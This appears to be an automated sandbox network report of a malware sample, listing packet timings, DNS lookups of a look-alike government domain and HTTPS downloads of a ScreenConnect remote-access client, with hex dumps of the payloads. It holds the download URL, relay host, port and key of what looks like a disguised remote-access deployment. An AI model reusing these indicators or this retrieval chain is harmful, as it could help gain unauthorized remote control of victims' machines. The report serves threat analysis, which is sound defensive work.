                                                                                                                        Nov 13, 2024 18:18:23.998037100 CET44349764185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:23.998075962 CET44349764185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:23.998136044 CET49764443192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:23.998148918 CET44349764185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:23.998174906 CET49764443192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:23.998213053 CET44349764185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:23.998260021 CET44349764185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:23.998279095 CET49764443192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:23.998291016 CET44349764185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:23.998342037 CET44349764185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:23.998342991 CET49764443192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:23.998409986 CET49764443192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:23.998424053 CET44349764185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:23.998816967 CET49764443192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:23.998903990 CET44349764185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:23.998974085 CET49764443192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:28.048228025 CET497668041192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:28.054056883 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:28.054136038 CET497668041192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:28.584891081 CET497668041192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:28.590507030 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:28.888472080 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:28.903675079 CET497668041192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:28.908673048 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:29.162642956 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:29.162667036 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:29.162739992 CET497668041192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:29.865813017 CET497668041192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:29.865933895 CET497668041192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:18:29.871001005 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:29.871079922 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:29.871181011 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:29.871296883 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:29.871326923 CET804149766185.49.126.73192.168.2.4
                                                                                                                        Nov 13, 2024 18:19:29.872234106 CET497668041192.168.2.4185.49.126.73
                                                                                                                        Nov 13, 2024 18:19:29.877376080 CET804149766185.49.126.73192.168.2.4
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 13, 2024 18:17:57.921045065 CET5551453192.168.2.41.1.1.1
                                                                                                                        Nov 13, 2024 18:17:57.974356890 CET53555141.1.1.1192.168.2.4
                                                                                                                        Nov 13, 2024 18:18:27.543122053 CET5721553192.168.2.41.1.1.1
                                                                                                                        Nov 13, 2024 18:18:28.010617018 CET53572151.1.1.1192.168.2.4
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Nov 13, 2024 18:17:57.921045065 CET192.168.2.41.1.1.10x8f2aStandard query (0)cloud-ssagov.icuA (IP address)IN (0x0001)false
                                                                                                                        Nov 13, 2024 18:18:27.543122053 CET192.168.2.41.1.1.10x4e0aStandard query (0)api.wisescreen.netA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Nov 13, 2024 18:17:57.974356890 CET1.1.1.1192.168.2.40x8f2aNo error (0)cloud-ssagov.icu185.49.126.73A (IP address)IN (0x0001)false
                                                                                                                        Nov 13, 2024 18:18:01.505163908 CET1.1.1.1192.168.2.40xd214No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                        Nov 13, 2024 18:18:01.505163908 CET1.1.1.1192.168.2.40xd214No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                        Nov 13, 2024 18:18:02.409730911 CET1.1.1.1192.168.2.40x6cc7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 13, 2024 18:18:02.409730911 CET1.1.1.1192.168.2.40x6cc7No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                        Nov 13, 2024 18:18:03.613070011 CET1.1.1.1192.168.2.40xbe11No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 13, 2024 18:18:03.613070011 CET1.1.1.1192.168.2.40xbe11No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                        Nov 13, 2024 18:18:28.010617018 CET1.1.1.1192.168.2.40x4e0aNo error (0)api.wisescreen.net185.49.126.73A (IP address)IN (0x0001)false
                                                                                                                        • cloud-ssagov.icu
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.449731185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:17:59 UTC613OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-13 17:18:00 UTC269INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 117161
                                                                                                                        Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:17:59 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:00 UTC16115INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                        2024-11-13 17:18:00 UTC16384INData Raw: 62 67 67 38 54 52 50 49 50 55 6c 52 38 45 41 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c
                                                                                                                        Data Ascii: bgg8TRPIPUlR8EAGliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJL
                                                                                                                        2024-11-13 17:18:00 UTC16384INData Raw: 41 62 77 42 73 41 46 41 41 59 51 42 75 41 47 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48
                                                                                                                        Data Ascii: AbwBsAFAAYQBuAGUAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAH
                                                                                                                        2024-11-13 17:18:00 UTC16384INData Raw: 41 61 51 42 73 41 47 6b 41 64 41 42 35 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46
                                                                                                                        Data Ascii: AaQBsAGkAdAB5AFAAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAF
                                                                                                                        2024-11-13 17:18:00 UTC16384INData Raw: 73 5a 57 4e 30 49 46 52 76 62 32 77 42 50 45 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48
                                                                                                                        Data Ascii: sZWN0IFRvb2wBPENob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIH
                                                                                                                        2024-11-13 17:18:00 UTC16384INData Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 56 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 41 70 68 2f 57 53 63 31 37 4c 6b 30 6f 49 7a 37 50 51 72 4d 4b 30 45 55 55 66 30 37 75 6d 2f 64 6b 6f 67 41 44 67 68 57 70 47 36 30 50 67 6b 2b 77 78 55 43 6e 35 42 41 4e 49 47 50 6e 4e 39 53 38 4d 6f 54 63 79 53 76 51 63 53 52 31 4b 31 32 45 75 53 7a 68 6a 6d 46 2f 36 61 33 4e 67 2b 6d 75 31 59 50 70 72 53 35 4f 4b 62 52 4e 4e 4e 6e 43 4f 41 77 41 41 47 67 4d 41 41 4a 30 42 41 41 42 69 41 51 41 41 55 41 49 41 41 4d 38 41 41 41 44 78
                                                                                                                        Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAVAAAAAAAAAFBBRFBBRFAph/WSc17Lk0oIz7PQrMK0EUUf07um/dkogADghWpG60Pgk+wxUCn5BANIGPnN9S8MoTcySvQcSR1K12EuSzhjmF/6a3Ng+mu1YPprS5OKbRNNNnCOAwAAGgMAAJ0BAABiAQAAUAIAAM8AAADx
                                                                                                                        2024-11-13 17:18:00 UTC16384INData Raw: 52 47 4c 47 53 51 41 76 51 66 51 69 53 55 38 6c 4d 44 6c 42 4b 78 78 45 69 6c 32 41 51 74 76 78 4b 49 41 42 6c 44 4c 68 69 6b 42 65 79 69 42 30 33 49 52 4f 4a 4e 49 68 77 69 59 52 71 7a 46 42 66 41 44 6b 68 51 41 42 54 41 6c 73 41 38 42 4f 35 4e 49 50 79 4e 67 6b 59 31 59 57 36 4a 69 65 30 53 53 41 74 44 4b 73 54 45 42 6c 79 2b 42 53 77 70 59 34 5a 74 49 38 51 74 59 63 69 4d 57 53 7a 67 41 31 44 4a 4d 4b 49 47 58 59 31 49 79 41 48 31 76 49 69 6b 51 63 4c 59 52 61 35 38 6c 48 41 42 51 50 53 31 72 2f 69 31 66 41 71 2b 58 6a 63 43 5a 52 46 70 46 77 43 49 62 73 59 34 6f 67 41 47 67 63 6c 4a 7a 41 6b 34 2b 68 68 5a 77 51 39 74 43 61 42 55 43 7a 6a 35 4e 75 45 30 42 44 41 42 56 30 37 63 6e 34 4c 4b 50 49 70 55 57 63 4b 4a 74 49 62 51 4f 41 63 74 73 78 4b 49 41
                                                                                                                        Data Ascii: RGLGSQAvQfQiSU8lMDlBKxxEil2AQtvxKIABlDLhikBeyiB03IROJNIhwiYRqzFBfADkhQABTAlsA8BO5NIPyNgkY1YW6Jie0SSAtDKsTEBly+BSwpY4ZtI8QtYciMWSzgA1DJMKIGXY1IyAH1vIikQcLYRa58lHABQPS1r/i1fAq+XjcCZRFpFwCIbsY4ogAGgclJzAk4+hhZwQ9tCaBUCzj5NuE0BDABV07cn4LKPIpUWcKJtIbQOActsxKIA
                                                                                                                        2024-11-13 17:18:00 UTC2742INData Raw: 45 71 6e 30 2f 6d 36 76 75 46 33 44 55 41 41 6a 79 75 41 5a 37 59 30 49 61 32 66 6e 35 7a 2b 64 64 61 36 34 58 4e 71 6e 58 57 33 44 30 34 36 58 2f 33 53 41 51 6a 67 34 45 6e 51 4d 2b 2f 32 52 67 2f 67 69 54 31 4b 47 31 39 50 74 73 2f 61 42 54 36 78 64 76 66 30 70 4f 4e 47 44 41 68 67 52 76 4f 78 6c 37 2b 2f 7a 38 7a 73 4e 6e 51 4f 35 63 62 35 61 62 64 64 37 6e 4f 37 69 4f 45 6a 74 32 46 41 41 42 4e 51 42 50 33 2b 34 6b 2f 50 47 39 69 45 31 44 6e 6f 44 76 76 68 58 61 54 77 2b 62 72 66 51 6b 41 41 4d 31 49 52 39 4b 65 4c 50 2f 33 36 72 46 6c 4e 53 42 75 64 37 66 61 6f 6e 32 42 72 32 31 55 59 45 4d 43 4d 55 49 50 31 35 76 4b 50 49 39 5a 68 62 55 35 57 2b 6e 62 62 51 5a 2f 69 52 51 69 37 43 51 4d 43 6d 43 46 72 73 4b 35 38 47 53 6d 41 6e 30 37 4f 30 65 6d 63
                                                                                                                        Data Ascii: Eqn0/m6vuF3DUAAjyuAZ7Y0Ia2fn5z+dda64XNqnXW3D046X/3SAQjg4EnQM+/2Rg/giT1KG19Pts/aBT6xdvf0pONGDAhgRvOxl7+/z8zsNnQO5cb5abdd7nO7iOEjt2FAABNQBP3+4k/PG9iE1DnoDvvhXaTw+brfQkAAM1IR9KeLP/36rFlNSBud7faon2Br21UYEMCMUIP15vKPI9ZhbU5W+nbbQZ/iRQi7CQMCmCFrsK58GSmAn07O0emc


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.449735185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:01 UTC98OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        2024-11-13 17:18:01 UTC234INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 17858
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:01 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:01 UTC16150INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                        2024-11-13 17:18:01 UTC1708INData Raw: 36 4d 44 44 6e 53 6c 72 7a 6d 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32
                                                                                                                        Data Ascii: 6MDDnSlrzm2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.449749185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:07 UTC124OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-13 17:18:08 UTC234INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 95512
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:08 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:08 UTC16150INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                        2024-11-13 17:18:08 UTC16384INData Raw: 68 7c dd 40 00 6a 02 e8 85 fe ff ff 83 c4 10 8b f0 ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40
                                                                                                                        Data Ascii: h|@jut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@
